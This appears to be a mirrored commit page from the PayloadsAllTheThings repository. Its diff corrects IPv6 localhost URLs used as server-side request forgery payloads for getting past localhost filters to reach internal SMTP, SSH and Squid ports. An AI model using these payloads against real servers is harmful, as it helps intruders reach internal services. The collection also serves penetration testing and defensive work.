mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
update bypass localhost with [::] payloads
This commit is contained in:
parent
f85f2cb4c6
commit
391b18cf20
@ -102,10 +102,10 @@ http://[::]:3128/ Squid
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://0000::1:80/
|
||||
http://0000::1:25/ SMTP
|
||||
http://0000::1:22/ SSH
|
||||
http://0000::1:3128/ Squid
|
||||
http://[0000::1]:80/
|
||||
http://[0000::1]:25/ SMTP
|
||||
http://[0000::1]:22/ SSH
|
||||
http://[0000::1]:3128/ Squid
|
||||
```
|
||||
|
||||
### Bypass localhost with a domain redirection
|
||||
|
Loading…
Reference in New Issue
Block a user